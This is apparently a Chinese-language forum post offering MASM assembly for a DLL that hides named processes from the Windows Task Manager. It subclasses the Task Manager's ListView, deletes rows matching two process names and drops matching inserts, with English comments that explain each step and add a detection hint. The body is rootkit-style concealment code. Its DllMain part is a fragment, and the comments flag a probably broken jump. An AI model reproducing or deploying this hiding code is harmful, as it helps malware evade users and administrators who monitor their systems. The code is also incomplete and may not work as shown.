[原创]一个简单的windows HOOK - 隐藏进程管理器中特定的进程
(适用平台:windows 2000 sp4,windows XP sp2)
mov eax,_hinstance
mov hinstance,eax
.if _dwreason == DLL_PROCESS_ATTACH
.if cutme == 0
mov cutme,1
.else
invoke CreateThread,NULL,0,addr CTProcEx,0,0,/
addr tid
.endif
.elseif _dwreason == DLL_PROCESS_DETACH
.if oldLVProc == 0
jmp quit
.endif
invoke SetWindowLong,hlv,GWL_WNDPROC,/
oldLVProc
.endif
;*********************************************************************
;-----------------------------------------------------------------------
; LRESULT NewLVProc(HWND hwnd, UINT umsg, WPARAM wparam, LPARAM lparam)
; Subclass window procedure that CTProcEx installs on the ListView hlv.
; ABI:   32-bit MASM stdcall proc; esi/edi/ebx saved by `uses`
; In:    hwnd, umsg, wparam, lparam = the message delivered to the ListView
; Out:   eax = result of the original proc, or 0 when the message is dropped
; Behaviour visible here: on LVM_INSERTITEMW and LVM_SETITEMW the item's
; pszText is converted to ANSI and compared with the global stxt; on an
; exact match the original proc is NOT called and 0 is returned, so the row
; is never inserted/updated. Every other message goes to oldLVProc.
; Only stxt is filtered here, although CTProcEx also removes stxt2 rows.
; Globals read: oldLVProc, buf, stxt (declared outside this listing).
; Detection note: after SetWindowLong(GWL_WNDPROC) this address is the
; control's wndproc; it resolves into the injected DLL's image, which a
; GWL_WNDPROC inspection of the ListView can surface.
;-----------------------------------------------------------------------
NewLVProc proc uses esi edi ebx hwnd,umsg,wparam,lparam
local retbyte:dword                     ; declared but never referenced
mov eax,umsg                            ; dispatch on the message id
.if eax == LVM_INSERTITEMW
assume esi:ptr LV_ITEM
mov esi,lparam                          ; esi = LV_ITEM* from the caller
mov ebx,[esi].pszText                   ; ebx = wide item text; LV_ITEM.mask is not inspected
invoke WideCharToMultiByte,CP_ACP,0,/
ebx,-1,addr buf,/
sizeof buf,NULL,NULL                    ; buf = ANSI copy; return value not checked
assume esi:nothing
invoke lstrcmp,addr buf,addr stxt       ; eax == 0 iff the text equals stxt
.if eax == 0
.else                                   ; match: fall through to xor/ret below (row dropped)
invoke CallWindowProc,oldLVProc,/
hwnd,umsg,wparam,lparam                 ; no match: forward and return the original result
ret
.endif
.elseif eax == LVM_SETITEMW
assume esi:ptr LV_ITEM
mov esi,lparam                          ; same filtering for in-place item updates
mov ebx,[esi].pszText
invoke WideCharToMultiByte,CP_ACP,0,/
ebx,-1,addr buf,/
sizeof buf,NULL,NULL
assume esi:nothing
invoke lstrcmp,addr buf,addr stxt
.if eax == 0
.else
invoke CallWindowProc,oldLVProc,/
hwnd,umsg,wparam,lparam
ret
.endif
.else
invoke CallWindowProc,oldLVProc,hwnd,umsg,/
wparam,lparam                           ; all other messages pass straight through
ret
.endif
xor eax,eax                             ; reached only on a matched name: return 0 without calling oldLVProc
ret
NewLVProc endp
;*********************************************************************
;-----------------------------------------------------------------------
; DWORD CTProcEx(LPVOID _pm)
; Thread entry started from the DLL_PROCESS_ATTACH path (CreateThread above).
; SetWindowLong(GWL_WNDPROC) only takes effect from inside the process that
; owns the window, so this DLL must already be loaded in the process owning
; hlv; how that happens is not shown in this listing.
; In:    _pm = thread parameter (never read here)
; Out:   eax = whatever the final SetWindowLong left in eax (the previous
;        wndproc), not a deliberate thread exit code
; Side effects: deletes any existing row whose text matches stxt or stxt2
; (LVM_FINDITEM + LVM_DELETEITEM), then replaces the ListView's wndproc
; with NewLVProc and stores the previous one in the global oldLVProc so
; later inserts are filtered and DLL_PROCESS_DETACH can restore it.
; Globals: hlv, stxt, stxt2, oldLVProc (declared outside this listing).
; Note: `quit:` (single colon) is proc-local in MASM, so the `jmp quit` in
; the DllMain fragment above could not reach it — presumably `quit::` or a
; transcription loss; confirm against the original source.
;-----------------------------------------------------------------------
CTProcEx proc uses esi edi ebx _pm
local ii:dword                          ; ii = row index returned by LVM_FINDITEM
local lvfi:LV_FINDINFO                  ; search descriptor for LVM_FINDITEM
mov lvfi.flags,LVFI_STRING              ; search by item text
lea eax,stxt
mov lvfi.psz,eax                        ; lvfi.psz = stxt
invoke SendMessage,hlv,LVM_FINDITEM,-1,addr lvfi
.if eax != 0ffffffffh                   ; -1 = no matching row
mov ii,eax
invoke SendMessage,hlv,LVM_DELETEITEM,ii,0   ; remove the existing row
.endif
mov lvfi.flags,LVFI_STRING              ; second pass for stxt2
lea eax,stxt2
mov lvfi.psz,eax
invoke SendMessage,hlv,LVM_FINDITEM,-1,addr lvfi
.if eax != 0ffffffffh
mov ii,eax
invoke SendMessage,hlv,LVM_DELETEITEM,ii,0
.endif
invoke SetWindowLong,hlv,GWL_WNDPROC,addr NewLVProc   ; install the subclass
mov oldLVProc,eax                       ; eax = previous wndproc, needed by CallWindowProc and the unhook
quit:
ret
CTProcEx endp
;*********************************************************************